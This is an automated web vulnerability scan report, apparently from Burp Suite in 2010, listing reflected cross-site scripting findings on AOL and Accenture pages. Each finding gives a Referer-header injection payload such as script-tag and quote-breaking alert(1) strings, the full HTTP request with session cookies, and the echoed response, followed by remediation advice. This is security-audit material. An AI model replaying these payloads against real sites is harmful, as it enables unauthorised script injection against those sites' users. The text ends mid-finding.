<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be569"><script>alert(1)</script>12ac101ed60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: autos.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=be569"><script>alert(1)</script>12ac101ed60
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6f31"><a>eaabc623be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /article_display.cfm?article_id=5052 HTTP/1.1 Host: newsroom.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=c6f31"><a>eaabc623be2
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 147fc"%3balert(1)//6c83825ff2d was submitted in the Referer HTTP header. This input was echoed as 147fc";alert(1)//6c83825ff2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 16:48:34 GMT Connection: close Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 68903
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/search/search.aspx" var formPageReferrer="accenture/search/147fc";alert(1)//6c83825ff2d" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d837b"%3balert(1)//f0fcb94c3c6 was submitted in the Referer HTTP header. This input was echoed as d837b";alert(1)//f0fcb94c3c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /accenture/search/search.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: d837b"%3balert(1)//f0fcb94c3c6
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:48:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:27 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: cache Pragma: no-cache Content-Length: 66799
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Search</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content=" ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/search/search.aspx" var formPageReferrer="accenture/search/d837b";alert(1)//f0fcb94c3c6" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3528e"%3balert(1)//6b050943d86 was submitted in the Referer HTTP header. This input was echoed as 3528e";alert(1)//6b050943d86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Date: Sun, 21 Nov 2010 16:47:05 GMT Connection: keep-alive Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:04 GMT; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; path=/ Cache-Control: private Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 60496
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title id="pageTitle">E-mail Alerts & Newsletters</title> <meta content="Microsoft Visual Studio .NET 7.1" n ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/registration/ean.aspx" var formPageReferrer="accenture/registration/3528e";alert(1)//6b050943d86" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86d19"%3balert(1)//702d592eee6 was submitted in the Referer HTTP header. This input was echoed as 86d19";alert(1)//702d592eee6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Accenture/Registration/GenericTemplate.aspx?NRMODE=Published&NRORIGINALURL=%2fGlobal%2fRegistration%2fMailTo%2ehtm&NRNODEGUID=%7b832928A7-7F09-4627-9CE3-4DDCCF3676AA%7d&NRCACHEHINT=Guest HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: 86d19"%3balert(1)//702d592eee6
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:30 GMT; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/ Set-Cookie: FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 46442
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">Send us an E-mail</title> <META http-equiv="Content-Type" content="text/html; charset=win ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/mailto.htm" var formPageReferrer="accenture/registration/86d19";alert(1)//702d592eee6" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f93bb"%3balert(1)//7c5bd8ef11 was submitted in the Referer HTTP header. This input was echoed as f93bb";alert(1)//7c5bd8ef11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Accenture/Registration/IMFormTemplate.aspx?NRMODE=Published&NRORIGINALURL=%2fGlobal%2fRegistration%2fFeedbackForm%2ehtm&NRNODEGUID=%7b13DF5E01-389F-4013-BC36-296A775C1FE5%7d&NRCACHEHINT=Guest HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: f93bb"%3balert(1)//7c5bd8ef11
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:47:53 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:53 GMT; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=%0aThanks+again+for+taking+the+time+to+submit+your+feedback+on+accenture.com%0a&ThankYouPageTitle=Feedback+Submitted&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/ Set-Cookie: FormSubmitURL=ThankYouPage.aspx; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 63558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">Submit feedback on accenture.com</title> <!-- Meta Data --> <meta http-equiv="Content ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/feedbackform.htm" var formPageReferrer="accenture/registration/f93bb";alert(1)//7c5bd8ef11" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ee77"%3balert(1)//ac5d1db6925 was submitted in the Referer HTTP header. This input was echoed as 3ee77";alert(1)//ac5d1db6925 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Accenture/Registration/LoginPage.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: 3ee77"%3balert(1)//ac5d1db6925
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:46:36 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:36 GMT; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 57251
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title> Register or Sign In </title> <script language="javascript"> <!-- function PopWindow(targeturl) ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/registration/loginpage.aspx" var formPageReferrer="accenture/registration/3ee77";alert(1)//ac5d1db6925" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b8e6"%3balert(1)//52d4b73a73a was submitted in the Referer HTTP header. This input was echoed as 7b8e6";alert(1)//52d4b73a73a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Accenture/Registration/SendPassword.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: 7b8e6"%3balert(1)//52d4b73a73a
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:46:38 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:38 GMT; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=LoginPage.aspx&Content=Thank you. Your password will be sent to your e-mail address.&ThankYouPageTitle=Send Password Confirmation&ReferrerPageTitle=Login; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 52598
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>Send Password</title> <script language="Javascript"> function WindowParent(link){ window.opener.docu ...[SNIP]... cript language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/registration/sendpassword.aspx" var formPageReferrer="accenture/registration/7b8e6";alert(1)//52d4b73a73a" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b801d"%3balert(1)//a7b9d784f20 was submitted in the Referer HTTP header. This input was echoed as b801d";alert(1)//a7b9d784f20 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Accenture/Registration/SignOutPage.aspx HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: b801d"%3balert(1)//a7b9d784f20
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:46:34 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:46:34 GMT; path=/ Set-Cookie: SignOutPage=PrevUrl=https://www.accenture.com/Accenture/Registration/b801d";alert(1)//a7b9d784f20; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache Content-Length: 51619
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <title>Sign Out Confirmation</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta ...[SNIP]... script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="accenture/registration/signoutpage.aspx" var formPageReferrer="accenture/registration/b801d";alert(1)//a7b9d784f20" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3399"%3balert(1)//c1a5427bf9a was submitted in the Referer HTTP header. This input was echoed as e3399";alert(1)//c1a5427bf9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Global/Registration/Email_This.htm HTTP/1.1 Host: www.accenture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; Referer: e3399"%3balert(1)//c1a5427bf9a
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition Content-Type: text/html; charset=utf-8 Date: Sun, 21 Nov 2010 16:45:31 GMT Content-Length: 27347 Connection: close Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:45:31 GMT; path=/ Set-Cookie: EmailColleagueLinkGuid=GUID=&IsSecured=; path=/ Set-Cookie: UrlTracker=ReferrerPageURL=/global/personalization&Content=&ThankYouPageTitle=Confirmation&ReferrerPageTitle=Your Content&ThankYouPageType=&ThankYouPageLinks=; path=/ Set-Cookie: FormSubmitURL=/Global/Registration/PopupThankYouPage; path=/ Cache-Control: no-cache Expires: -1 Pragma: no-cache Pragma: no-cache
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">E-mail Article to a Colleague</title> <META http-equiv="Content-Type" content="text/html; ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/email_this.htm" var formPageReferrer="accenture/registration/e3399";alert(1)//c1a5427bf9a" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d2a"%3balert(1)//20d6ecca920 was submitted in the Referer HTTP header. This input was echoed as 15d2a";alert(1)//20d6ecca920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">Submit feedback on accenture.com</title> <!-- Meta Data --> <meta http-equiv="Content ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/feedbackform.htm" var formPageReferrer="accenture/registration/15d2a";alert(1)//20d6ecca920" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da574"%3balert(1)//2f39dd2c397 was submitted in the Referer HTTP header. This input was echoed as da574";alert(1)//2f39dd2c397 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title id="pageTitle">Send us an E-mail</title> <META http-equiv="Content-Type" content="text/html; charset=win ...[SNIP]... <script language="JavaScript" type="text/javascript"> var s_account="accaccenturecom,accglobal" var currentPage="global/registration/mailto.htm" var formPageReferrer="accenture/registration/da574";alert(1)//2f39dd2c397" </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0b3c"%3balert(1)//dafb89c6dc9 was submitted in the Referer HTTP header. This input was echoed as d0b3c";alert(1)//dafb89c6dc9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
